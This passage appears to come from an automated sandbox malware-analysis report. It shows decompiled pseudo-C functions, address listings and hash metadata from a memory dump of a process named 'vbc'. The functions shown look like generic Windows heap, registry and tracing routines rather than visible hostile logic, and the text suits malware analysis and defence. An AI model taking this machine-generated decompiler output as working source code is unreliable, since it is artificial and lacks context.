					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x16a7b9c; // 0x0
					_t74 = L015D4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E015F9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L015D77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E015FF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E015F13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L015D77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E015F9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                  0x015bc608
                                                  0x015bc615
                                                  0x015bc625
                                                  0x015bc62d
                                                  0x015bc635
                                                  0x015bc640
                                                  0x015bc680
                                                  0x015bc687
                                                  0x015bc688
                                                  0x015bc689
                                                  0x015bc694
                                                  0x015bc694
                                                  0x015bc642
                                                  0x015bc64a
                                                  0x015bc697
                                                  0x01627a25
                                                  0x01627a2b
                                                  0x01627a2e
                                                  0x01627a30
                                                  0x01627bea
                                                  0x01627bea
                                                  0x00000000
                                                  0x01627bea
                                                  0x01627a36
                                                  0x01627a43
                                                  0x01627a48
                                                  0x01627a4c
                                                  0x01627a4e
                                                  0x00000000
                                                  0x00000000
                                                  0x01627a58
                                                  0x01627a5a
                                                  0x01627a5b
                                                  0x01627a5c
                                                  0x01627a5d
                                                  0x01627a63
                                                  0x01627a64
                                                  0x01627a6a
                                                  0x01627a6c
                                                  0x01627a6e
                                                  0x016279cb
                                                  0x016279cb
                                                  0x016279ce
                                                  0x016279d0
                                                  0x01627a98
                                                  0x01627a9b
                                                  0x01627a9b
                                                  0x01627a9e
                                                  0x01627aa1
                                                  0x01627bbe
                                                  0x01627bbe
                                                  0x01627bc0
                                                  0x01627be0
                                                  0x01627be0
                                                  0x01627a01
                                                  0x01627a01
                                                  0x01627a05
                                                  0x01627a07
                                                  0x01627a15
                                                  0x01627a15
                                                  0x01627a1a
                                                  0x00000000
                                                  0x01627a1a
                                                  0x01627bc2
                                                  0x01627bc6
                                                  0x01627bc9
                                                  0x01627bcd
                                                  0x01627bcf
                                                  0x016279e6
                                                  0x016279e6
                                                  0x016279eb
                                                  0x016279eb
                                                  0x016279ef
                                                  0x016279f1
                                                  0x00000000
                                                  0x00000000
                                                  0x016279f3
                                                  0x016279f5
                                                  0x016279ff
                                                  0x016279ff
                                                  0x00000000
                                                  0x016279ff
                                                  0x016279f7
                                                  0x016279fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x016279fd
                                                  0x01627bd5
                                                  0x01627bd8
                                                  0x00000000
                                                  0x00000000
                                                  0x01627ba9
                                                  0x01627bac
                                                  0x01627bb0
                                                  0x01627bb1
                                                  0x01627bb1
                                                  0x01627bb6
                                                  0x00000000
                                                  0x01627bb6
                                                  0x01627aa7
                                                  0x01627aaa
                                                  0x00000000
                                                  0x00000000
                                                  0x01627ab2
                                                  0x01627ab3
                                                  0x01627ab5
                                                  0x01627aec
                                                  0x01627aef
                                                  0x01627b25
                                                  0x01627b28
                                                  0x01627b62
                                                  0x01627b64
                                                  0x01627b8f
                                                  0x01627b92
                                                  0x01627b96
                                                  0x01627b98
                                                  0x00000000
                                                  0x00000000
                                                  0x01627b9e
                                                  0x01627b9f
                                                  0x01627ba3
                                                  0x00000000
                                                  0x01627ba3
                                                  0x01627b66
                                                  0x01627b68
                                                  0x01627ae2
                                                  0x01627ae2
                                                  0x00000000
                                                  0x01627ae2
                                                  0x01627b6e
                                                  0x01627b72
                                                  0x01627b75
                                                  0x01627b81
                                                  0x01627b85
                                                  0x01627b87
                                                  0x00000000
                                                  0x00000000
                                                  0x01627b31
                                                  0x01627b34
                                                  0x01627b3c
                                                  0x01627b45
                                                  0x01627b46
                                                  0x01627b4f
                                                  0x01627b51
                                                  0x01627b57
                                                  0x01627b59
                                                  0x01627b59
                                                  0x00000000
                                                  0x01627b59
                                                  0x01627b77
                                                  0x00000000
                                                  0x01627b77
                                                  0x01627b2a
                                                  0x00000000
                                                  0x01627b2a
                                                  0x01627af1
                                                  0x01627af3
                                                  0x00000000
                                                  0x00000000
                                                  0x01627afb
                                                  0x01627afc
                                                  0x01627afe
                                                  0x00000000
                                                  0x00000000
                                                  0x01627b00
                                                  0x01627b03
                                                  0x00000000
                                                  0x00000000
                                                  0x01627b05
                                                  0x01627b09
                                                  0x01627b0d
                                                  0x01627b0f
                                                  0x00000000
                                                  0x00000000
                                                  0x01627b18
                                                  0x01627b1d
                                                  0x00000000
                                                  0x01627b1d
                                                  0x01627ab7
                                                  0x01627ab9
                                                  0x00000000
                                                  0x00000000
                                                  0x01627abf
                                                  0x01627ac1
                                                  0x00000000
                                                  0x00000000
                                                  0x01627ac3
                                                  0x01627ac6
                                                  0x00000000
                                                  0x00000000
                                                  0x01627ac8
                                                  0x01627acc
                                                  0x01627ad0
                                                  0x01627ad2
                                                  0x00000000
                                                  0x00000000
                                                  0x01627adb
                                                  0x00000000
                                                  0x01627adb
                                                  0x016279d6
                                                  0x016279d9
                                                  0x016279dc
                                                  0x01627a91
                                                  0x01627a94
                                                  0x00000000
                                                  0x01627a94
                                                  0x016279e2
                                                  0x00000000
                                                  0x016279e2
                                                  0x01627a74
                                                  0x01627a7a
                                                  0x00000000
                                                  0x00000000
                                                  0x01627a8a
                                                  0x01627a21
                                                  0x01627a21
                                                  0x00000000
                                                  0x01627a21
                                                  0x015bc650
                                                  0x015bc651
                                                  0x015bc656
                                                  0x015bc65c
                                                  0x015bc65d
                                                  0x015bc663
                                                  0x015bc664
                                                  0x015bc66a
                                                  0x015bc66e
                                                  0x016279c5
                                                  0x016279c7
                                                  0x00000000
                                                  0x016279c7
                                                  0x015bc67a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f7514516b261e29bc30c023d2d1f5d285c7f182d991e32ee09e2bfdbbf79852
                                                  • Instruction ID: 1400be7850ba45a263e0b569c1874d95fc1866e64cee8b7d086b242ff31a74ce
                                                  • Opcode Fuzzy Hash: 2f7514516b261e29bc30c023d2d1f5d285c7f182d991e32ee09e2bfdbbf79852
                                                  • Instruction Fuzzy Hash: 8E817075604A168BDB26CE58CC80F6B77E4FBA4364F14486AEE459B341D330ED41CFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0164B8D0 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E0164B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x16a7b9c; // 0x0
				_t124 = L015D4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E015F9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E015F95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E015F95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L015D77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E015F9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E015F95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x16a7b9c; // 0x0
									_t92 = L015D4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E015F9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E015BA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0164E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0164E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E015F95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                  0x0164b8d9
                                                  0x0164b8e4
                                                  0x00000000
                                                  0x0164b8e6
                                                  0x0164b8f3
                                                  0x0164b8f5
                                                  0x0164b8f5
                                                  0x0164b8f8
                                                  0x0164b920
                                                  0x0164b924
                                                  0x0164b936
                                                  0x0164b939
                                                  0x0164b93d
                                                  0x0164b948
                                                  0x0164b9a0
                                                  0x0164b9a0
                                                  0x0164b9a4
                                                  0x0164b9bf
                                                  0x0164b9c4
                                                  0x0164b9c6
                                                  0x0164b9cd
                                                  0x0164b9d1
                                                  0x0164bad4
                                                  0x0164bad8
                                                  0x0164bada
                                                  0x0164badc
                                                  0x0164badc
                                                  0x0164badf
                                                  0x0164bae0
                                                  0x0164bae2
                                                  0x0164bae4
                                                  0x0164baec
                                                  0x0164baee
                                                  0x0164baf0
                                                  0x0164baf0
                                                  0x0164baec
                                                  0x0164bafb
                                                  0x0164bafc
                                                  0x0164bafe
                                                  0x0164bb01
                                                  0x0164bb01
                                                  0x00000000
                                                  0x0164bb06
                                                  0x0164b9d7
                                                  0x0164b9db
                                                  0x0164b9db
                                                  0x0164b9de
                                                  0x0164b9de
                                                  0x0164b9e4
                                                  0x0164b9e7
                                                  0x0164b9ea
                                                  0x0164b9ec
                                                  0x0164b9ef
                                                  0x0164b9f3
                                                  0x0164ba1b
                                                  0x0164ba1b
                                                  0x0164ba23
                                                  0x0164ba24
                                                  0x0164ba27
                                                  0x0164ba2a
                                                  0x0164ba2b
                                                  0x0164ba2e
                                                  0x0164ba30
                                                  0x0164ba37
                                                  0x0164ba3f
                                                  0x0164ba9c
                                                  0x0164baa2
                                                  0x0164bb13
                                                  0x0164bb15
                                                  0x0164baae
                                                  0x0164baae
                                                  0x0164bab3
                                                  0x0164bab5
                                                  0x0164baba
                                                  0x0164bac8
                                                  0x0164bac8
                                                  0x0164baba
                                                  0x0164bacd
                                                  0x0164bacf
                                                  0x00000000
                                                  0x0164bacf
                                                  0x0164bb1a
                                                  0x00000000
                                                  0x0164bb1c
                                                  0x0164baa7
                                                  0x0164bb11
                                                  0x00000000
                                                  0x0164bb11
                                                  0x0164baa9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0164ba41
                                                  0x0164ba41
                                                  0x0164ba41
                                                  0x0164ba58
                                                  0x0164ba5d
                                                  0x0164ba62
                                                  0x00000000
                                                  0x00000000
                                                  0x0164ba64
                                                  0x0164ba67
                                                  0x0164ba68
                                                  0x0164ba69
                                                  0x0164ba6c
                                                  0x0164ba6f
                                                  0x0164ba71
                                                  0x0164ba78
                                                  0x0164ba80
                                                  0x00000000
                                                  0x00000000
                                                  0x0164ba90
                                                  0x0164ba90
                                                  0x0164ba97
                                                  0x00000000
                                                  0x0164ba97
                                                  0x0164b9f5
                                                  0x0164b9f7
                                                  0x0164b9f7
                                                  0x0164b9fa
                                                  0x0164ba03
                                                  0x0164ba07
                                                  0x0164ba0c
                                                  0x0164ba10
                                                  0x0164ba17
                                                  0x00000000
                                                  0x0164b9f7
                                                  0x0164b9a6
                                                  0x0164b9a8
                                                  0x0164b9af
                                                  0x0164b9b3
                                                  0x00000000
                                                  0x00000000
                                                  0x0164b9b9
                                                  0x00000000
                                                  0x0164b9b9
                                                  0x0164b94d
                                                  0x0164b98f
                                                  0x0164b995
                                                  0x0164b999
                                                  0x0164b960
                                                  0x0164b967
                                                  0x0164b968
                                                  0x0164b96a
                                                  0x00000000
                                                  0x0164b96a
                                                  0x0164b99b
                                                  0x0164b99e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0164b99e
                                                  0x0164b951
                                                  0x0164b954
                                                  0x0164b95a
                                                  0x0164b95e
                                                  0x0164b972
                                                  0x0164b979
                                                  0x0164b97d
                                                  0x0164b97f
                                                  0x0164b980
                                                  0x0164b982
                                                  0x0164b984
                                                  0x00000000
                                                  0x0164b984
                                                  0x00000000
                                                  0x0164b926
                                                  0x00000000
                                                  0x0164b926

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bef1c1b263cf67b6dd3a8f460b94d3c4664ddf3ef36b0bb117f64b0f5700e028
                                                  • Instruction ID: db810bd41c80cceddfdfc169b7acce53032d8a7e49050f099429945f5c25d180
                                                  • Opcode Fuzzy Hash: bef1c1b263cf67b6dd3a8f460b94d3c4664ddf3ef36b0bb117f64b0f5700e028
                                                  • Instruction Fuzzy Hash: E971F336200B02EFE731CF18CC44F66BBA5FF84724F154928EA558B6A0DB75E945CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01636DC9 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E01636DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01636B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E015D7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E015F9AE0();
					_t87 = L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0163795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0163795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0163795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0163795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L015D4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01636B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01636B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01636B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01636B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E015D7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E015F9AE0();
								L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L015D2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L015D2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L015D2400( &_v52);
							}
							if(_v28 >= 0) {
								return L015D2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                  0x01636dd4
                                                  0x01636dde
                                                  0x01636de1
                                                  0x01636de3
                                                  0x01636de6
                                                  0x01636de9
                                                  0x01636dec
                                                  0x01636def
                                                  0x01636df2
                                                  0x01636df5
                                                  0x01636dfe
                                                  0x01636e04
                                                  0x01636e09
                                                  0x01636e0d
                                                  0x01636e18
                                                  0x01636e1b
                                                  0x01636e22
                                                  0x01636e2d
                                                  0x01636e30
                                                  0x01636e36
                                                  0x01636e42
                                                  0x01636e4d
                                                  0x01636e50
                                                  0x01636e55
                                                  0x01636e5c
                                                  0x01636e6e
                                                  0x01636e5e
                                                  0x01636e67
                                                  0x01636e67
                                                  0x01636e73
                                                  0x01636e74
                                                  0x01636e77
                                                  0x01636e7c
                                                  0x01636e7d
                                                  0x01636e8e
                                                  0x01636e93
                                                  0x01636e9c
                                                  0x01636ea8
                                                  0x01636eab
                                                  0x01636eac
                                                  0x01636eb3
                                                  0x01636ecd
                                                  0x01636edc
                                                  0x01636ee2
                                                  0x01636ee5
                                                  0x01636ef2
                                                  0x01636efb
                                                  0x01636f01
                                                  0x01636f06
                                                  0x01636f0b
                                                  0x01636f11
                                                  0x01636f1a
                                                  0x01636f22
                                                  0x01636f26
                                                  0x01636f26
                                                  0x01636f33
                                                  0x01636f41
                                                  0x01636f44
                                                  0x01636f47
                                                  0x01636f54
                                                  0x01636f65
                                                  0x01636f77
                                                  0x01636f7c
                                                  0x01636f82
                                                  0x01636f91
                                                  0x01636f99
                                                  0x01636fa3
                                                  0x01636fae
                                                  0x01636fae
                                                  0x01636fba
                                                  0x01636fbb
                                                  0x01636fbc
                                                  0x01636fc1
                                                  0x01636fc2
                                                  0x01636fd3
                                                  0x01636fd8
                                                  0x01636fd8
                                                  0x01636fdf
                                                  0x01636fe8
                                                  0x01636fee
                                                  0x01636fee
                                                  0x01636ff5
                                                  0x01636ffb
                                                  0x01636ffb
                                                  0x01637004
                                                  0x00000000
                                                  0x0163700a
                                                  0x01637004
                                                  0x01636eb3
                                                  0x01636e9c
                                                  0x01637015

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                  • Instruction ID: 4862d2aa2e89c0d317747d89b13330bc0ae3378215b0add798f36abf3bae7746
                                                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                  • Instruction Fuzzy Hash: 82717071A0060AEFDB11DFA9C984AEEFBB9FF88714F104569E505EB250D730EA41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015B52A5 Relevance: .2, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E015B52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E015CEEF0(0x16a79a0);
					_t104 =  *0x16a8210; // 0x1152c58
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E015CEB70(_t93, 0x16a79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E015F9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E015CEEF0(0x16a79a0);
